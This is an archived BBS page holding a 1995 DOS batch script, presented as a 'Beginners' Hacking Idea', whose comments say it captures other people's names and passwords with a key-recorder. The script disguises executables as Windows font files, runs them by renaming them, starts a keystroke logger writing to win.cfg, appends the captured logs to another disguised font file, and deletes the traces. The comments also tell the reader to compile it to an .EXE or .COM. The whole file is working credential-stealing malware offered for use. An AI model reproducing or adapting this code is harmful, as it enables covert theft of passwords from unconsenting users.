home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
texts
/
hacking_info_a-l
/
beg-hck2
/
TSR.BAT
< prev
next >
Wrap
DOS Batch File
|
1995-03-08
|
2KB
|
68 lines
@ECHO OFF
REM ELiNT's ■BETA■ Beginners' Hacking Idea! 03/08/1995
REM Technic Professions (c) 1995 All rights reserved.
REM This very simple batch will allow you to see the power of a simple batch
REM to "bait" other people's name and password with the use of a key-recorder.
REM Use a batch-to-executable compiler to compile this batch to a .EXE or a
REM .COM. If your batch compiler is compiles only .COMs, then it really
REM depends on what you are going to link to. Just becareful not to link up a
REM .COM exceeding 64k!!!
REM Remove the "rem" below to debug this batch and you could find where a
REM problem started from. The rest is up to you...later.
rem ECHO PHASE 1 - step 1.0
if not exist c:\windows\system\fnt____e.fot goto END
if not exist c:\windows\system\fnt____d.fon goto END
if not exist c:\windows\system\win.cfg goto skipB
rem ECHO PHASE 1 - step 1.1
ren c:\windows\system\fnt____e.fot fnt____e.exe >NUL
c:\windows\system\fnt____e.exe /c /h c:\windows\system\win.cfg c:\windows\system\12345678.901 >NUL
ren c:\windows\system\fnt____e.exe fnt____e.fot >NUL
rem ECHO PHASE 1 - step 1.2
echo>c:\windows\system\win.cfg
ren c:\windows\system\win.cfg 7 >NUL
del c:\windows\system\7
:skipB
rem ECHO PHASE 1 - step 2.0
if not exist c:\windows\system\12345678.901 goto skipA
rem ECHO PHASE 1 - step 2.1
type c:\windows\system\12345678.901>>c:\windows\system\ARABIC_I.FOT
rem ECHO PHASE 1 - step 2.2
echo>c:\windows\system\12345678.901
rem ECHO PHASE 1 - step 2.3
ren c:\windows\system\12345678.901 7 >NUL
rem ECHO PHASE 1 - step 2.4
del c:\windows\system\7
:skipA
rem ECHO PHASE 2
ren c:\windows\system\fnt____d.fon fnt____d.exe >NUL
c:\windows\system\fnt____d.exe /i /z /r /-m /-s /k=NONE c:\windows\system\win.cfg
ren c:\windows\system\fnt____d.exe fnt____d.fon >NUL
:END